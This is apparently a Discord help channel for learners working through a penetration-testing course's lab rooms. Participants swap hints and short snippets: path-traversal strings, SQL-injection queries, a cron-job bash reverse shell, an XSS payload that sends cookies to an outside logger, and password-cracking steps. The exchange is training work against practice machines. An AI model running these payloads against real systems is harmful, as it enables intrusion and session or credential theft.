#junior-pentester-path

1 messages · Page 19 of 1

pale parcel
#

its not showing up at all

noble rose
#

Always listening

#

Nothing happeninh

pale parcel
#

can i send my payload here?

noble rose
#

We only need to edit our IP and port number within right?

pale parcel
mellow karma
#

What can possibly go wrong ? Trying since 1 hour

noble rose
#

No need for this one its already there

#

Im trying using a vpn on my oen machine

pale parcel
#

sorry i dont get it, how should i restart victime box?

#

you mean the vm machine

#

ok

#

virtual machine

noble rose
#

The website machine that you're attacking

deft valley
mellow karma
pale parcel
#

@steel nymph i restarted it still not working

mellow karma
#

By suppose you mean expected request ?

novel rover
#

is string.printable enough for password guessing ?

pale parcel
#

please help me

near vapor
#

php?

finite summit
#

IDOR: Task 2 An IDOR Example. When I click on the emails and check the URLs most are not found in the Attackbox. Is their an issue with task 2

near vapor
#

That's what I thought...

noble rose
#

Lollll i won a 3 pound voucher

novel rover
copper sentinel
#

gratz

noble rose
#

But i can't use it cuz im on a different currency

#

Hahaha

#

Thanks guys

novel rover
#

i dont think its problem

noble rose
#

Yeah but if i wanna buy something its in pounds

novel rover
#

the problem is that i dont have other 17 pounds)

noble rose
#

Hahaha

#

Exactly

#

I only have the SQLI left in that category

novel rover
#

does blind sqli password bruteforce works only with cleartext passwords?

viral token
#

no luck. found ||table_name='analytics_referrers'|| and ||table_name!='analytics[]referrers' or 'analytics[^]referrers'|| is there any wildcard to check numbers? and I checked the numbers manually. Also, I think || 'analytics_referrers' || is right, because I got the ||COLUMN_NAME= 'id' and COLUMN_NAME ='domain'; || by using that table_name. how could I find more COLUMN_NAME by using filter. (Can I filter more that one input eg. ||COLUMN_NAME ='domain' 'id';|| @steel nymph

#

oh, okay!

red wraith
#

well, finally, ended the "Jr penetration tester learning path"

noble rose
#

Jack, just drink some rum

red wraith
#

with no interesting prize to redeem, just streekes, and pentest title

novel rover
#

ohh, finally
that was interesting, but need rest a lot now)

#

thanks that person who used digit pin-code as a password)

wheat wigeon
#

Hello guys! just a quick question, in the Linux PrivESC, is there any other way to check what python version is installed rather than just executing python? find / -name python* -type f 2>/dev/null gets me a ton of info and not the straight up answer

wheat wigeon
zenith edge
#

I just realized this Learning Path with tickets was a thing today lol

wheat wigeon
#

well it definitely lists all the pythons but it doesn't straight get the python 2.7.6 that im looking for when i execute it, anyway it's way clear than executing find / -name python* -f 2>/dev/null

#

Ty anyway!!! ur always helping here lol

next lanceBOT
#

Gave +1 Rep to @steel nymph

silent heron
#

Weird question that I'm hoping I'm not missing an obvious answer for.

I'm doing the File Inclusion room at the moment and I'm struggling with task 5 - LFI 2, the first question asks for the request that you use to get up the files, however the answer I've got (using the method they display in the room) just comes back as a wrong answer and trying the other method, doesn't work for me. I'm using the null bite trick and that seems to work but it's the "wrong" answer. Anyone else come across this and able to shed any light? I'll take any guidance I can get on it

modest arch
#

Linux PrivEsc task 6 - 'sorry, you are not allowed to set the following environment variables: LD_PRELOAD'

i cannot find a way around this, any hints please?

silent heron
#

Thanks for that, I'll open burp and try that way, what's the worst that can happen

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

ah ok, i had my wires crossed thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

remote estuary
#

need help on Task5 windows privesc, sc stop dllsvc & sc start dllsvc didn't work

lusty bolt
#

Once I got the hang of it, I actually really liked the Linux Privilege Escalation room

#

The capstone was quite easy though

modest arch
remote estuary
#

i think my payload are correct

#

can i dm you?

wheat wigeon
next lanceBOT
#

Gave +1 Rep to @wispy nimbus

mint tree
#

Hey, having issues with the unquoted service path windows exploit. Is the service not starting part of the challenge?

#

when using sc start service

#

or net start service

#

yeah got all questions right so far apart from the last one which requires the exploit to work

#

hmm ok

#

system error

#

file or directory is corrupted

modest arch
#

Hello all, In linuxprivesc task 7 when I try : find / -type f -perm -04000 -ls 2>/dev/null I do not see nano => cant add user -> cant access flag. what am I missing?

knotty walrus
#

anyone solved the SSRF room?

#

is this wrong for task 2?

void saddle
#

hi, is the Jr Penetration Tester path for premium user only, or anyone can access it

knotty walrus
#

need to add a ?url parameter?

knotty walrus
#

I get 404 response

#

what is wrong with the link

#

Well, I know it is wrong thanks to the 404 response

void saddle
next lanceBOT
#

Gave +1 Rep to @knotty walrus

knotty walrus
#

feel free to DM me

void saddle
#

Thank you!

knotty walrus
#

nothing

#

Oh okay it worked when I refreshed the page

#

sorry

worthy pumice
#

No response in "Privilege Escalation: Cron Jobs" task

knotty walrus
#

what is the issue here?

worthy pumice
#

-sh: 25: ./backup.sh: Permission denied

tacit ether
#

i swear if i get one more pentester title ticket

knotty walrus
#

focus on the knowledge you are getting dude

#

I also get 1day freeze

tacit ether
#

i know most of this, it's nice to refresh but i was blitzing in vague hopes of getting dat oscp

#

also, one short for ejpt, which, meh, but still

knotty walrus
#

as far as I know

#

the OSCPs are claimed

#

am i wrong

tacit ether
#

drat. ah well

knotty walrus
#

what should I change at your link

#

doesnt it needs to be server?

shadow echo
#

Well I atleast got a £3 Swag Voucher 😄

knotty walrus
#

yeah

#

It changes the server value

earnest shell
#

I need some help with SSRF room task 2

#

@steel nymph thanks I just saw hehe

next lanceBOT
#

Gave +1 Rep to @steel nymph

earnest shell
#

@steel nymph I figured I should inject server into server request somehow. Could I do this in the code?

#

Or the path hmmmm

heady abyss
#

Please I need help with linprivesc task 7(SUID) non of the SUID enabled binaries can be taken advantage of
Thanks in advance

earnest shell
#

@steel nymph I'm pasting the server.website in. But I guess my format is wrong. api /-= (url). Just getting my format wrong I guess

heady abyss
#

Already checked all on the website and still got nothing

#

I'll check again thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

heady abyss
#

Just got the gist😃 thanks

modest arch
#

Can someone help me? I’m stuck with the Metasploit exploitation room

#

getting the meterpreter session

near vapor
#

In regards to challenge 1 in LFI, I have tried to || change the request to post in burp and add a file var in the request but got nothing in return.|| also for LFI challenge 3 I have tried || the ....// filter trick and %00 but both don't work.||

modest arch
#

i'm not sure how to do that

shy sundial
#

I'm stuck on "Authentication Bypass" Task 3 Brute forcing with ffuf. I'm not getting a username/password but 0 errors.

near vapor
#

I read that earlier. can I pls dm you my request I modified in burp?

shy sundial
#

Didn't seem to change anything. I'm sure its something minor I'm overlooking too.

#

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200 I'm actually using the machine IP in the command lol.

#

Showed me what I saved in the file from the previous task.

marble hamlet
#

you might have to manually type the 3 usernames into a .txt file and use that

shy sundial
next lanceBOT
#

Gave +1 Rep to @marble hamlet

earnest shell
timber summit
#

Hello guys, who can briefly explain the difference between PIM( Privileged Identity Management) and PAM(Privileged Access Management)

earnest shell
#

yeah im missing the secret code.Just my format somehow is incorrect its like i paste it in the wrong place

shadow echo
sterile crescent
next lanceBOT
#

Gave +1 Rep to @sterile crescent

rapid kite
#

hey, anyones knows where can i get the hash of the commit in github?

deep pike
#

Does anyone have any links on how to make your own server? I am trying to do the RFI playground challenge and I need create a server to upload a file. Thanks!

near vapor
#

I'm in LFI challenge 3. Is this on the right track? ||/challenges/chall3.php?file=welcome&../../../../../etc/flag3||

near vapor
#

That will serve the directory that your in

deep pike
#

Oh thanks CheckN8

#

good to know

near vapor
# deep pike good to know

You can use any of these.

python3 -m http.server 8080
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000```
next lanceBOT
#

Gave +1 Rep to @near vapor

warped storm
#

For the Practical XSS: Am I supposed to wait a few minutes after submitting a ticket with the payload? Or am I supposed to open the ticket myself? I get the cookie if I select the ticket, but it says it's incorrect after cracking it. I've tried both cracked and un-cracked cookie value

tough basin
#

any luck with solving this task? I'm stuck on this task as well

near vapor
shadow echo
shadow echo
warped storm
earnest shell
deep pike
#

For the RFI playground is my code ||<?php echo gethostname() ?>|| correct?

near vapor
#

I used something different.

near vapor
#

use a ||php|| specific function.

deep pike
#

okay I will give it a try need to look it up

earnest shell
warped storm
#

like how I am with that Blind-SQL task; Task8. the only one I'm missing

near vapor
earnest shell
deep pike
#

Yes I have I need to remeber how I did it though lol

earnest shell
#

i know its &

near vapor
warped storm
deep pike
near vapor
#

@deep pike
I noticed that the url doesn't accept /. I did this ||/challenges/chall3.php?file=welcome&?file=/etc/flag3||

warped storm
earnest shell
warped storm
#

not quite

earnest shell
#

but the right spots?

warped storm
#

I can tell you ||there is no (x) after ?server||

#

and no ()

earnest shell
#

it blurs out

deep pike
earnest shell
#

hmmm so its the right place.....its just i have to do &x=

warped storm
#

yep,|| just not after ?server|| you're also missing something between ||=webserver|| pretty sure

near vapor
deep pike
earnest shell
modest arch
#

Can anyone give me nudge on the second question in Privilege Escalation: SUID. Its asking for user2's password and I nabbed the shadow and passwd files and ran them through john with no luck for the user I need

warped storm
modest arch
#

@near vapor hi man can you give my a idea what this task ask for Which function is causing the directory traversal in Lab #4? cant figure what to put there

near vapor
#

@modest arch
Take a look at Task 3.

modest arch
#

you have no idea how much it took to reallize what was asking task 3

#

i have just that one and cant figure what it is

near vapor
modest arch
#

cant figure what word is so long

#

Anyone finished with Linux PrivEsc?

near vapor
near vapor
deep pike
near vapor
#

got it.

deep pike
#

with the playground flag I am still getting errors and unsure as to why.

#

I have a server at 0.0.0.0:8080 and am getting my ||rfi.txt which first had <?php echo gethostname(); ?> that didnt work so I tried echo php_uname('n');||

#

and im getting an error that says couldn't connect to server. I also tried to connect in a sperate tab and that worked.

copper garnet
#

how do i use the tryhackme request catcher?

chrome sand
#

Stuck on File Inclusion Task 4

#

Not sure how to input what is being discussed

copper garnet
#

i'm also stuck on it

chrome sand
#

Do we add directly to url or the seach bar provided

copper garnet
#

well

chrome sand
#

Lab 2 right?

copper garnet
#

have you tried adding what's been told to the url?

chrome sand
#

Yeah but it doesn't seem to work

#

I tried the ../../../../etc/passwd

#

Were u able to solve lab 1?

copper garnet
#

i wasn't

chrome sand
#

I got the answer but i dont think the server gave me the response i was supposed to get

bleak pilot
#

@chrome sand think full path.

chrome sand
#

Hmm full path through the url? @bleak pilot

copper garnet
#

on the active reconnaissance room, task 5, it keeps saying that my connection has been closed

bleak pilot
#

is this your Question that you are working on:

#

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

copper garnet
#

i believe he's talking about lab 2

chrome sand
#

Second question

#

For Lab 2

#

Yeha

#

What is the directory specified in the include function

#

But even for lab 1 i got the answer but wasn't able to read the etc/passwd file

bleak pilot
#

/etc/passwd

chrome sand
#

For lab 1 in the URL i had

bleak pilot
#

Give me a couple of minutes. Was elsewhere. I'll fire it up.

chrome sand
#

Ip/lab1.php?file=/etc/passwd

#

No worries, thanks!

bleak pilot
#

http or https?

earnest shell
chrome sand
#

Http

#

I got the answer

bleak pilot
#

@earnest shell Read the top of the page for the server you want to query.

chrome sand
#

It's includes

#

Got it from the error messages

#

Lol

#

But still not able to read the files the labs are meant for

bleak pilot
#

Good job @chrome sand

earnest shell
chrome sand
next lanceBOT
#

Gave +1 Rep to @bleak pilot

copper garnet
#

still stuck on lab #2

bleak pilot
#

@earnest shell what task are you in?

earnest shell
#

i feel like im on 99.9.....but im not seeing the server lol

bitter snow
#

Too bad they have extra databases in there. Wild goose chase and you have to start over again. Hours gone. Why did they have to put an extra database that could be discovered on the SQLi module?

copper garnet
earnest shell
bleak pilot
#

@earnest shell so on the final page of instructions, pay close attention to the server that has the flag.

#

Good job @copper garnet

chrome sand
copper garnet
#

thanks

chrome sand
#

Discord has been a really good resource for me as well as reddit

earnest shell
#

oh wait i see question marks

bleak pilot
#

@earnest shell The format of your original line was really close other than the (). And read the server name they say the flack is on. You are SO close.

earnest shell
#

im soooo close lol

bleak pilot
#

your ? isn't the correct thing nor is the second server name

#

You are VERY close!

#

Sorry. Forget about the ? statement. Been a long day. your ? marks are all good.

#

Read the description of the server holding the flag.

earnest shell
#

what the heck pretty funny that i dont see it

bleak pilot
#

Are you in the split screen window?

earnest shell
#

i am

bleak pilot
#

See if you can left-click and hold while dragging from underneath the url line to the Server Requesting at the bottom.

#

No, sorry again a long day. look at your id in the line you posted.

#

character right after it.

bleak pilot
#

Nope. original character before the id was correct.

earnest shell
bleak pilot
#

That actually looks correct.

earnest shell
#

it was the =

earnest shell
bleak pilot
#

I apologize for the sideways path.

earnest shell
#

thanks so much!!!! that one killed me but still going

earnest shell
bleak pilot
#

Good job. and good luck.

#

You owe me nothing. Helping one another out makes our industry stronger.

chrome sand
#

Having some trouble with Task 5 if the LFI room, i was able to execute the exploit, but the question is what function is causing the directory traversal in lab #4?

I have tried nullbyte as well as current directory but none of them seem to be it

drifting drum
#

Read the error message

#

It's not asking for anything you input.

#

It's asking for the php function that allows directory traversal to happem

#

Happen

chrome sand
#

Got it

#

Thanks! @drifting drum

next lanceBOT
#

Gave +1 Rep to @drifting drum

modest arch
chrome sand
#

I was able to get to the file in the first try on this one so didn't see the error messages

#

I added some fuzz now and was able to see it

drifting drum
#

Ah yea. Even if you can get the file, it's always good to check errors so you know what's hapoening

chrome sand
#

Makes sense!

slate jewel
#

Hey all I’m having an issue in Auth. Bypass Task 4 getting the Curl req #1 and #2 to properly change the users password reset link to attacker@hacker.com. I’ve reset my machine and attack box 5 times thinking there may be an error. I copy the curl verbatim, but the website continues to show the original email address. Any one else have this issue?

open hornet
#

hello guys
i need help with SSRF jr pentest task 5
does any one know or have done this?

long trench
#

hello guys
i need some nudge, File Inclusion VM - Task 8 flag2?

earnest shell
#

@open hornet he got the flag on that question. 🚩Welldone

rustic galleon
#

Hi. Is there any other way to access the windows machine on Windows PrivEsc? Other than using the attackbox. Im trying to find a way to acces using my own kali machine

rustic galleon
full escarp
rustic galleon
#

Task 2

#

It doesnt state how to connect or any scanning etc. I tried some google and saw the guy use the attack box

full escarp
#

i think you cant use rdp for that since it does not provide any creds nor do i know if theyre rdp connection is open

full escarp
rustic galleon
#

Ok then. So i assume theres no way to connect to them untill task 5 6

#

Thanks

earnest shell
#

Room cross sight scripting task 8. What ip do I have to add into the path that gets pasted into the ticket. #help

#

And the port number

balmy mantle
earnest shell
#

@balmy mantle just waiting for the cookie🍞

balmy mantle
earnest shell
#

It gave me a THM..... But nothing in the catcher... Hmmm

subtle heron
#

I need some help on Linux PrivEsc $PATH (Task 10)?

earnest shell
#

@balmy mantle dmed you

peak lotus
earnest shell
#

@balmy mantle Thanks for the hints got the flag 🚩

next lanceBOT
#

Gave +1 Rep to @balmy mantle

modest arch
#

can anyone tell me if I am looking at the correct exploit?

#

no replies : )

idle bison
# modest arch no replies : )

Everyone here is a volunteer. You need to be patient.
Can you explain to me why you think it's that exploit? I can check your process but I haven't completed the room

modest arch
#

I found the CVE after searching the vulnerable application name with version

#

But the script has many errors

modest arch
peak lotus
#

@modest arch Could you please provide content of the script ?

idle bison
#

You're running it with python 3

#

It's written for python 2

#

raw_input and print as a keyword rather than a function, those are python 2 things.

modest arch
#

lesson learned for skipping python2 🙂

idle bison
#

You should be able to tell from the shebang at the start.
This is one of many reasons that it's critical to actually read the exploit even just at a high level.

#

The other reason is so that you don't break stuff.
There was famously a fake SSH RCE exploit that would wipe your attacking system.

#

It's a big thing that OSCP/PWK tries to get stuck in your brain. Reading and understanding and fixing exploits

peak lotus
#

That's what I thought

#

You should also change 3 lines in this script

idle bison
#

So useful things to note from reading that, it expects a proxy on 127.0.0.1:8080

peak lotus
#

Url
Comment proxy line
Remove proxy mention from "r ="

idle bison
#

You can start burp if you want that, or modify it to not use the proxy

idle bison
peak lotus
#

Picture found on THM forum

idle bison
#

It's important to know why you're doing that too though

modest arch
# peak lotus

If I keep the proxy as in this pic and start burp will the request be captured in burp?

idle bison
#

Yep.

#

It'll even be intercepted if you have intercept on

modest arch
peak lotus
#

Sure

rustic galleon
#

Simple sad story. I finished the path. Collected all tickets. Vouchers completed are literally free stuff. Title and streak freeze.. 🤣 others just stuck at 2 tickets..

modest arch
#

yesterday I completed like 10rooms and only got the title 1day straek freeze tickets which really sucks

mild blaze
#

File Inclusion Task 8 - Challenge 2. Does anyone have a clue what to do after I've ||changed the cookie||? I see an error now, but cant figure out how to get around this one.

modest arch
#

What's the error? Does it look anything like what you did to your cookie ?

mild blaze
# modest arch What's the error? Does it look anything like what you did to your cookie ?

Looks like it has accepted me as admin, but that I'm not complete with the lab just yet 🙂

It says:
||Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Warning: include() [function.include]: Failed opening 'includes/Admin.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php' ) in /var/www/html/chall2.php on line 37||

modest arch
mild blaze
next lanceBOT
#

Gave +1 Rep to @dull turtle

little sparrow
#

get 1 hop, the TCP/IP fingerprint, no exact OS matches

modest arch
#

Remove the --traceroute and see if that helps

obsidian cloud
#

Can't seem to get Content Discovery on the VM to work

#

the content discovery didn't say you needed to be on the VPN?

next lanceBOT
#

Gave +1 Rep to @steel nymph

obsidian cloud
#

@steel nymph Thanks for letting my know about the VPN ... the room designers need to really include a sign post as part of a clear precise instructions.

next lanceBOT
#

Gave +1 Rep to @steel nymph

marsh agate
#

Hello. Can someone tell me about the Windows Privesc room in JR pentester? Task 2. How do I get into the deployed machine ? There are no credentials anywhere...

#

Oh, thank you so much. So much time, it would have been possible for the THM team to fix it.

next lanceBOT
#

Gave +1 Rep to @steel nymph

twilit yoke
#

I have enabled foxyproxy and put intercept on at proxy tab but the browser isn't hanging? i can see i receive data on the other tabs but cannot choose 2 forward or drop the intercept. Is there a setting i need 2 check?

#

thanks @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

mild blaze
#

Still stuck on File inclusion Task 8 - Challenge 2.
Changed the ||cookie to value admin and got the admin page. But cant figure out how to get to the flag.||
Any tips?

#

thanks - ill try playing around more 🙂

next lanceBOT
#

Gave +1 Rep to @steel nymph

lusty bolt
#

how do I connect to the windows machine for windows privesc

#

is it rdp?

#

oh

#

thanks

wicked perch
sour sun
#

Hello!
Since the number of prizes is limited, is it still worth to try getting tickets? I mean, all limited prizes are claimed by now aren't they?

mild blaze
sour sun
mild blaze
sour sun
lusty bolt
#

Why did I just get kicked from the RDP connection

#

Now I can't connect

#

I restarted the machine

#

Now it works

#

Odd

#

Aaand disconnected again..

shadow echo
lusty bolt
#

no

#

just rdp

shadow echo
lusty bolt
#

try what

shadow echo
lusty bolt
#

why doesn't remote desktop connection work

#

also what

#

that's only for linux

shadow echo
lusty bolt
#

i don't know how you expect me to install a linux app on windows but ok

shadow echo
lusty bolt
#

I just sent this image ...

shadow echo
lusty bolt
#

no

#

what

limber cobalt
#

Hi! I stucked on question (File Inclusion) "Give Lab #3 a try to read /etc/passwd. What is the request look like? ". But I get this and can't figure answer? Why "/lab3.php?file=include("../../../../../../etc/passwd%00").".php");" is not correct?

#

Ok, I got this. I counted the number of * and edited payload xD

analog quartz
#

I'm completing nmap post port scans room and it has a question What does the script http-robots.txt check for I ran the script I got open ports and services but I'm not able to figure out the answer

bleak pilot
#

@analog quartz you can also cat that scrip and it describes it in the description.

analog quartz
#

okayy

modest arch
#

i did use a http portscan module but it says this is not a wordpress site

#

what can i do now : (

analog quartz
#

got it thanks

next lanceBOT
#

Gave +1 Rep to @steel nymph

harsh verge
#

||https://website.thm/analytics?referrer= referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'username';--||

What now? Time Based, Blind SQLi.

Any help would be appreciated.

modest arch
#

ik so what should I do now there are too maaany http modules

harsh verge
#

That's the part i didn't really understood :d

#

Yeah, I guess that's what we need to pass the level.

modest arch
#

give me the filter word please : (

harsh verge
#

xD I was doing it correctly

#

just typed the wrong password

#

lmao

modest arch
#

still wrong module @steel nymph

#

?

#

or can anyone else tell me what's wrong

mortal latch
#

I'm not able to ping the windows privesc machine attached with the task even after connecting with the VPN. Any suggestions?

modest arch
#

Is something not right?

#

thanks AA lot @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

I really would have missed that

mortal latch
#

Thank you mate got it

next lanceBOT
#

Gave +1 Rep to @steel nymph

gentle jetty
#

hey, i have issues with the freaking Burp and i don't know what I am doing wrong..(burp: Intruder Task 10,11)
For some reasons, when using Intruder and start the attack - all of the results have same status and length value... I had to manually try 100 acc + pass to get to the right one.

pearl compass
#

@steel nymph on file inclusion task 2 I've changed the cookies and I have been looking at the errors I get in the response window but I can't seem to get the correct file path to reveal the flag. Any tips or suggestions?

#

how do you use spoiler?

#

I've done || http://MACHIN_IP/challenges/chall2.php?file=../../../../etc/flag2||, Also || http://MACHINE_IP/challenges/chall2/etc/flag2|| and other iterations of those.

#

also I dont have a cookies tab in my developer console and I cant seem to find it?

#

ok thank you Ill look around

#

@steel nymph This is what I got

lusty bolt
harsh verge
pearl compass
#

@steel nymph || I've changed the path to /etc/flag2 and it just loads another cookie window in Guest again ||

drifting drum
#

Combine your answers

rustic galleon
drifting drum
#

You need to unshadow the file first

#

You need a copy of both the etc/passwd file and the /etc/shadow file. Then use

unshadow passwd.txt shadow.txt > unshadow.txt

#

Then crack the unshadowed file

#

There's likely more than one password in there and there's a good chance the root passwd isn't crackable. You only need the hash for user 2

muted anchor
#

Hello I'm doing the Vulnerabilities 101 Room. is NVD and exploit-db down for anyone else?

novel rover
#

does crontab work every 6 mins in linux privesc?

lusty bolt
#

1 I thought

novel rover
#

anyway i waited more and didnt get my shell(

#

neither python nor bash didnt work

wraith ice
#

hey where is the "flagUSP.txt" in Windows Privesc Unquoted Service Path? Can't seem to find it

muted anchor
#

Weird. I'm having DNS problems with nvd and exploit-db. Maybe my ISP has a problem looking at those sites. haha

wraith ice
lusty bolt
#

lmao what

wraith ice
#

I upgraded to meterpreter and search cause why not

wraith ice
next lanceBOT
#

Gave +1 Rep to @lusty bolt

waxen mantle
#

I'm pretty confident that I could have broken into the server room and taken the servers by now vs getting flags from task 8 in the File Inclusion room

pearl compass
#

@waxen mantle same ive been stuck on task 2 all day 😦

waxen mantle
#

I don't see how tasks 1-7 supplement task 8 challenges

waxen mantle
#

or just launching the vm? lol

pearl compass
#

@waxen mantle yes task 8 challenge 2 lol

waxen mantle
#

I got challenge 2 and yet 1 and 3 evade me

pearl compass
#

I'm stuck here

waxen mantle
shadow echo
drifting drum
pearl compass
#

i still don't understand how the error text works of how it is supposed to point you in the right direction

terse tundra
#

Hi, can you help me for ssrf room, I don’t understand how it work?(view site)

shadow echo
full escarp
novel rover
#

don't get how to privesc using path
if file created by me have same permissions as me

pearl compass
#

@full escarp ok will do thanks

next lanceBOT
#

Gave +1 Rep to @full escarp

full escarp
#

theres also set of payloads you can try, check payloadofallthings in github

idle bison
#

Payloads all the things

wraith ice
#

I get this in the dll hijack in windows privesc. what to do?

wraith ice
novel rover
deep scaffold
wraith ice
wraith ice
novel rover
#

maybe i did something wrong
but when i run test nothing happened
neither error, nor result

quick light
#

I'm not getting reverse shell in linux privesc task 9 cron jobs

wraith ice
novel rover
novel rover
modest arch
#

Do any one know Nmap host discovery using tcp and udp in Nmap live host discovery

noble dust
#

Hello guys, I am trying to do the room "Protocols and Servers 2" and I am stuck at the task 6. I executed this command :

hydra -t 64 -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.64.86 imap

But after few hours I still don't have any result, is there somebody who can help me to find what I am doing wrong please ?

noble dust
#

I know, this is why I am asking 😭

modest arch
#

I am stuck at which tcp ping scan does not require a privileged account

wraith ice
wraith ice
noble dust
next lanceBOT
#

Gave +1 Rep to @wraith ice

deep scaffold
deep scaffold
wraith ice
bleak pilot
#

@wraith ice attack box or your own box?

wraith ice
#

btw, you can't connect directly as a different user from the browser right?

wraith ice
deep scaffold
wraith ice
#

oh wait. task manager can't stop it. but it restarted it

#

cheers

modest arch
#

I am doing Nmap live host discovery and stuck at task 7

deep scaffold
noble dust
deep scaffold
bleak pilot
#

@modest arch what are you stuck on?

modest arch
#

How to answer

#

The answer format

bleak pilot
#

For which question? There are three.

modest arch
#

First one

deep scaffold
wraith ice
#

@noble dust gave answer in like 10 secs

#

Last 2 tickets 😥 . This is all I got for 50 tickets.

bleak pilot
#

@modest arch They only talk about two TCP type scans and each is explained in their respective paragraph.

deep scaffold
wraith ice
quick light
#

but not with cron

novel rover
#

in what file is ur command?

quick light
novel rover
#

hmm
ok, idk then, sorry
i had some typos so it wasnt working

modest arch
#

@bleak pilot i don't understand the answer format

wet gulch
#

can i have a hint for file inclusion task 8 challenge 2 flag 2

#

i currently have burp up and see the file format but im struggling turning the file path into a request and get the fille\

bleak pilot
#

@modest arch Tis is the question that I think you re talking about: Which TCP ping scan does not require a privileged account?

wet gulch
#

file

bleak pilot
#

Is this correct?

wraith ice
wraith ice
modest arch
#

Ya

wet gulch
#

okay

wraith ice
noble dust
noble dust
wraith ice
noble dust
#

With the right IP of course

bleak pilot
#

@modest arch I guess I don't understand the confusion then.

wraith ice
wraith ice
worthy escarp
#

I'm working on Local File Inclusion and have no idea what is being asked of me in Task 4, Lab Lab #2

#

In Lab #2, what is the directory specified in the include function?

noble dust
noble dust
wraith ice
#

did you try terminating and restarting the vm you are attacking?

noble dust
noble dust
wraith ice
#

you can dm me if you are not comfortable posting here

noble dust
#

It's not the problem, I tried the copy/past and the drag and drop but Discord doesn't react.. when something don't work nothing work ahah

quick light
wraith ice
wraith ice
worthy escarp
next lanceBOT
#

Gave +1 Rep to @wraith ice

worthy escarp
#

Sitting in front of my face the entire time -.-

quick light
#

someone please help in cronjobs

#

task 9 linux privesc

wraith ice
wet gulch
#

okay im in the repeater trying a numerous different variations of this cookie, am i on the right track? Cookie: THM=admin; file=..%2f..%2f..%2fetc%2fflag2

quick light
wraith ice
wet gulch
#

iirc? sorry im new

wraith ice
quick light
#

I'm not able to run it as karen

wet gulch
#

if i send file only not encoded it says "refresh" @wraith ice

quick light
#

not in sudoers

wraith ice
#

@steel nymph Umm. I am also confused about what you are saying...

#

nah. I am done

#

k

quick light
#

I'm able to get normal reverse shell but not the root one

#

same as what is given on thm

#

./backup.sh

worthy escarp
#

Alright, more issues on PHP. Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

wraith ice
#

DO NOT EXECUTE THE SCRIPT. Let cron do it's thing. That's like the whole point of cron

quick light
wraith ice
#

Wait 1 min. It should run every minute

quick light
#

I've waited much more than 1 min

#

it doesn't work

wraith ice
#

what is output of cat backup.sh? What's in there?

#

If it doesn't call back to you, try to use the local nc binary to get a revshell to localhost (127.0.0.1)

quick light
#

#!/bin/bash

bash -i >& /dev/tcp/<HOST>/6666 0>&1

quick light
wraith ice
#

terminate and restart the machine. might fix if something broke

quick light
#

oh wait

#

I got the root shell

#

damn

wraith ice
#

lol. congratz. sometimes you gotta be patient...

worthy escarp
#

Need help with -
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

#

Unable to get the version ID

#

oops

#

Access Denied! allowed files at THM-profile folder only!

#

I just don't understand this at all - literally my brain isn't able to comprehend it -.-

#

This is my first room today =[

worn kite
#

Definitely, taking a step back has solved a lot for me

worthy pumice
#

"Once your friend reaches 500 points, email us with your TryHackMe username and we will award you and your friend 2 extra tickets"

#

Where i need to write about referral

quick light
#

nfs not giving root shell

sage citrus
#

Did anyone got the challenge 2 of file inclusion ?

#

Tried almost all the combination couldnt get any error

novel rover
#

no, noone)

buoyant tiger
#

Hello, could anyone tell me where is that flagUSP.txt file on the last win Privesc Challenge ? lol

lunar thunder
#

hi, i am at the cross site scripting. For the blind XSS, i first tried to write the payload by myself, sending the cookies on a http.server started with Python. I didnt receive anything so i tried with a nc handler, which didnt work either.

buoyant tiger
#

i'm looking around for 1h

quick light
lunar thunder
#

To check if it was my payload that wasnt working, i copied pasted the given payload ( and did specify my port )

#

but it still isnt working

mellow flume
drowsy sparrow
#

Anyone able to assist with File Inclusion - Task 8 - Flag3. I've tried for the last two days and not sure what I'm doing wrong. The closest I've come is with getting character encoded output and an (include) directory that doesn't seem to help.

sage citrus
mellow flume
#

||did you change the cookie?||

drowsy sparrow
#

For 8:2 look at the hint.

lunar thunder
#

finally, i used the tryhackme requests handler, got my url and everything, by nothing showed up. Does anyone achieved this challenge and can hint me around what im doing wrong ?

sage citrus
mellow flume
#

also currently stuck on this

lunar thunder
#

ok, already done so 3 times already

quick light
mellow flume
lunar thunder
#

i even used dns to get the cookie

#

tried to concatenate it to my domain, not working either

#

yes i do

#

which btw isnt a valid base64

sage citrus
quick light
#

created that nfs exectuable after mounting one of the folders and set the suid bit and executed it but it's giving normal shell

#

oh F

#

ubuntu

lunar thunder
#

ok thanks, gonna restart a little more

buoyant tiger
#

Hello @steel nymph

#

did you finished the WinPrivesc Task6 ?

lunar thunder
#

btw, while i was checking if my payload was faulty or not, i tried a few fetch in the debugger, fetch that mozilla didnt like at all, responding with some "mixed content warning"

#

i read the mozilla page on it halfway

buoyant tiger
#

any hint where to find this damn flag txt file ?

#

yes

lunar thunder
#

does a payload like

<img src="oi" onerror="document.location.href = 'http://' + btoa(document.cookie).replaceAll('=', '') + 'f79d0a17b78d347b4a0e47deeeb7b1e7.log.tryhackme.tech';">

would circumvate this protection ?

#

yeah, i just tried this since it wasnt working

#

but yeah just gonna restart and go with the given one, a bit tired of this room

deep pike
#

I'm having a tough time with the 4th flag in task 8 for rfi

#

What I have tried so far is making my own server with python3 -m http.server 8080, next I made a text file that has ||<?php echo gethostname(); ?>||

#

I put that into the url with ?file=0.0.0.0:8080/rfi.txt

#

and get an error of couldnt connect to server

#

o

#

facepalm

#

so I can just use my machines ip?

#

thank you I will give that a try

digital pendant
#

XSS room, last challenge:
I am connected to vpn (tun0) and have netcat running on 9001
now i should receive a cookie to this terminal with this request, right?
